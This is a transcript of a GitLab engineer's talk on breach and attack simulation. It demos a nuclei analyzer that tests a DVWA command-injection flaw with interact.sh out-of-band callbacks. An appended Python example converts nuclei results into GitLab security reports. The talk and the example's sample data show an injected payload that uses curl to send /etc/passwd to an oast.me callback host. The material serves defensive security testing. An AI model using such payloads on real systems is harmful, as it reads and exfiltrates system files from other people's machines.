Description
Hi y'all, it's Erran Carey, kicking off Black History Month with a showcase of Breach and Attack Simulation (BAS) Single-Engineer Group progress from January.
I've been working with the Threat Insights, Dynamic Analysis, and Vulnerability Research teams.
Check for written updates in this GitLab issue: https://gitlab.com/gitlab-org/incubation-engineering/breach-and-attack-simulation/meta/-/issues/1
So what is breach and attack simulation, assuming you have no prior knowledge of breach and attack simulation?
We can consider breach and attack simulation to be a security testing method for validating application and endpoint security controls. That includes things like running web applications, where you're running maybe a Ruby on Rails application or a PHP application, or if you have an endpoint deployed, where you actually deploy inside of a Docker container or you deploy inside of an AWS EC2 instance. For any type of infrastructure you're deploying to, it's being able to test the different security controls on that, to make sure your operating system and your actual application that you're running on top of that are running in a secure manner.
BAS differentiates itself from things like dynamic analysis because, as opposed to looking at purely the application side, BAS is focusing on whether you can actually exploit a particular vulnerability. So for a vulnerability that's been detected by a DAST scanner, you'd typically take that report, and if you're a penetration tester or a red teamer you'd actually go through and test: hey, are there any mitigations in place, or can I actually exploit this vulnerability?
In some way, we're able to take those vulnerability tools and then, on top of that, add the ability to simulate attacker techniques as part of that life cycle. That can be through GitLab CI, or it could potentially be other things, similar to how we run the Kubernetes agent, for example, where we can have continuous testing and breach and attack simulation against the mitigations you've put in place for vulnerabilities you've detected previously, in a prior part of your security testing cycle.
The goals for this are essentially to curate attack scenarios. So we want to be able to create an inventory of different attack techniques that are being used. Similarly, if you look at the MITRE ATT&CK framework, it sort of enumerates all the various techniques that can be used by attackers, and on top of that it's sort of picking and choosing which ones of those are going to be efficient at testing the security controls that are in place.
On top of that, I've been going ahead and collaborating, so the breach and attack simulation tag has been welcomed with open arms in GitLab; it's been pretty fun. I've been working with Threat Insights, even in terms of vulnerability dashboards and creating generic reports for BAS, and adding on to the existing capabilities I've created with the nuclei analyzer, where I'm able to integrate directly into the existing reports.
Through what Threat Insights have provided me, the Dynamic Analysis team has been super helpful; I've been collaborating with them quite a lot on how I display vulnerabilities and exploit information. And then Vulnerability Research has been super helpful in terms of how I've been planning my approach at creating these different exploits, and even injecting custom exploit payloads on top of things like the active checks that DAST supports.
So next I'll jump right into a demo of some of the existing functionality that's been deployed.
So if I go to this nuclei templates job that I've created, we can see that it's using my custom nuclei analyzer Docker image. This nuclei analyzer, what this is, is a custom scanner which is compliant with the GitLab security report format. So this is a generic format that you can use for any security tool, as long as you export to it.
So nuclei exports the JSON lines report, and I'm able to take that and import it into GitLab by running this nuclei analyzer tool to get it into the appropriate format. I've updated this recently to include the request and response information, as well as adding the ability to use the interact.sh extension for nuclei, so that the integration for nuclei actually goes ahead and, using the interact.sh service, tests for out-of-band connections.
So it will dynamically provision a unique payload against oast.me, and what oast.me will do is, it's a unique payload, and that unique payload I inject into the template using a custom nuclei template. That payload will actually, in the command injection portion, have a callback for that unique payload against the interact.sh server, and so doing this I'm able to go ahead and add some additional details into the vulnerability report.
So if I come here, we can see that we have this DVWA (Damn Vulnerable Web App) command injection vulnerability. If we look at that, we can see here's our existing information that we get in any type of DAST report.
But in the evidence section we can see what I've injected, using Threat Insights' generic report format. We can see that I've done a POST request to interact.sh and I've included the contents of /etc/passwd, just to prove that I was able to read a file off the file system through the exploits that I provided. And then we can see here that interact.sh responded with this custom payload, which allows me to verify that in this job I was able to get that callback, with end-to-end out-of-band testing being done here.
So you can see here there's a payload which I'm using, that custom one for the IP in this command injection. The way I've structured the exploit is for ping: it will operate, again, and still do a DNS request against the hostname, and then on top of that I've injected some custom PHP which will go ahead and actually do a POST request including the contents of /etc/passwd, and so doing that I'm able to validate that we've got these additional details.
So I've created a custom namespace called nuclei template, so there's no collisions with existing templates in DAST. And so what I intend to do is have customers start adding this additional job, where they're adding an additional DAST report artifact, which will amend or append to the end of their DAST report, so they'll see vulnerabilities from nuclei on top of their existing vulnerabilities, which I think will be quite good. There are some templates in nuclei that I want to add around command injection,
where we take a more active approach, and I've already talked to the Dynamic Analysis team about having them come on board and start using interact.sh, whether it's self-hosted or creating our own command server, for proving out-of-band connections.
Appendix: there's the links to the handbook, the issues, and the new nuclei analyzer custom scanner for DAST, which is adding some breach and attack simulation capabilities.
If we look at the handbook page, we can see the product affinity, and we can see a list here of the jobs to be done, where I go through different attack scenarios that we want to be capturing, and in terms of metrics, very much want to look at... I noticed that there's a new nuclei action that's been created recently for GitLab actions, GitHub Actions, and so with GitHub Actions.
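The conversion the speaker describes above, nuclei's JSON lines report being turned into a GitLab security report with request/response evidence and the interact.sh callback attached, as an added illustrative example in Python. This is not the GitLab nuclei analyzer's own code. The nuclei-side field names follow nuclei's JSON export (template-id, info, host, matched-at, request, response, interaction); the GitLab-side field set and the schema version string are this example's understanding of the security report schema and should be checked against the published schema; the sample finding, host, payload and interactsh id are constructed for the example.

```python
# Added example: nuclei JSON lines -> GitLab security report ("dast" category).
# Not the GitLab nuclei analyzer's own code. Nuclei keys follow nuclei's JSON
# export; the GitLab field set and schema version are assumptions to verify.
import hashlib
import json
from datetime import datetime, timezone
from urllib.parse import urlparse

SEVERITIES = {"info": "Info", "low": "Low", "medium": "Medium",
              "high": "High", "critical": "Critical"}

# Constructed sample (host, payload and interactsh id are made up): a DVWA-style
# ping form whose "ip" parameter reaches a shell, plus the interactsh callback
# that carried /etc/passwd, recorded by nuclei as the "interaction".
SAMPLE_JSONL = json.dumps({
    "template-id": "nuclei-template/dvwa-exec-oob",
    "info": {"name": "DVWA command injection (OOB confirmed)", "severity": "critical",
             "description": "Ping form passes the ip parameter to a shell."},
    "type": "http", "host": "http://dvwa.local",
    "matched-at": "http://dvwa.local/vulnerabilities/exec/",
    "request": ("POST /vulnerabilities/exec/ HTTP/1.1\r\nHost: dvwa.local\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                "ip=127.0.0.1;curl -d @/etc/passwd http://c0ffee.oast.me&Submit=Submit"),
    "response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<pre>PING 127.0.0.1</pre>",
    "interaction": {"protocol": "http", "unique-id": "c0ffee",
                    "remote-address": "203.0.113.10:51234",
                    "raw-request": "POST / HTTP/1.1\r\nHost: c0ffee.oast.me\r\n\r\n"
                                   "root:x:0:0:root:/root:/bin/bash\n"},
}) + "\n"


def parse_http(raw):
    """Split a raw HTTP message into (start line, [{name, value}], body)."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:  # tolerate LF-only captures
        head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    headers = [{"name": n.strip(), "value": v.strip()}
               for n, _, v in (h.partition(":") for h in lines[1:])]
    return lines[0], headers, body


def evidence(finding):
    """Request/response evidence; the interactsh interaction goes into the
    summary so the report shows the callback, not only the injected request."""
    req_line, req_headers, req_body = parse_http(finding["request"])
    resp_line, resp_headers, resp_body = parse_http(finding["response"])
    status = resp_line.split(" ", 2)
    ev = {"summary": f"nuclei template {finding['template-id']} matched",
          "request": {"method": req_line.split(" ", 1)[0], "url": finding["matched-at"],
                      "headers": req_headers, "body": req_body},
          "response": {"status_code": int(status[1]),
                       "reason_phrase": status[2] if len(status) > 2 else "",
                       "headers": resp_headers, "body": resp_body}}
    oob = finding.get("interaction")
    if oob:
        ev["summary"] += (f"; out-of-band {oob['protocol']} callback from "
                          f"{oob.get('remote-address', '?')} (id {oob['unique-id']}): "
                          f"{oob.get('raw-request', '')}")
    return ev


def to_vulnerability(finding):
    """One nuclei result -> one GitLab vulnerability. Only a finding with a recorded
    interaction is Confirmed: the payload actually executed and called home."""
    info, url = finding["info"], urlparse(finding["matched-at"])
    ev = evidence(finding)
    stable = f"{finding['template-id']}|{finding['matched-at']}".encode()
    return {
        "id": hashlib.sha256(stable).hexdigest(),
        "category": "dast",
        "name": info["name"],
        "description": info.get("description", ""),
        "severity": SEVERITIES.get(str(info.get("severity", "info")).lower(), "Unknown"),
        "confidence": "Confirmed" if "interaction" in finding else "Medium",
        "scanner": {"id": "nuclei", "name": "nuclei"},
        "location": {"hostname": f"{url.scheme}://{url.netloc}", "path": url.path,
                     "method": ev["request"]["method"], "param": ""},
        "identifiers": [{"type": "nuclei_template_id", "name": finding["template-id"],
                         "value": finding["template-id"]}],
        "evidence": ev,
    }


def build_report(jsonl_text, scanner_version="dev"):
    """One vulnerability per non-empty input line, plus the scan block."""
    findings = [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S")
    return {"version": "15.0.4",  # assumed schema version
            "vulnerabilities": [to_vulnerability(f) for f in findings],
            "scan": {"scanner": {"id": "nuclei", "name": "nuclei", "version": scanner_version,
                                 "vendor": {"name": "ProjectDiscovery"}},
                     "type": "dast", "start_time": now, "end_time": now, "status": "success"}}


if __name__ == "__main__":
    print(json.dumps(build_report(SAMPLE_JSONL), indent=2))
```

Running it prints the report; in a pipeline the written file would be attached as the job's `dast` report artifact, as described above, so the nuclei findings land beside the existing DAST findings. The `confidence` field carries the BAS distinction the talk draws: a finding is marked Confirmed only when nuclei recorded an interactsh interaction, meaning the injected payload ran and called home, rather than a response merely matching a pattern, and the raw callback (here carrying /etc/passwd) is kept in the evidence summary so the reviewer sees the proof, not just the request that was sent.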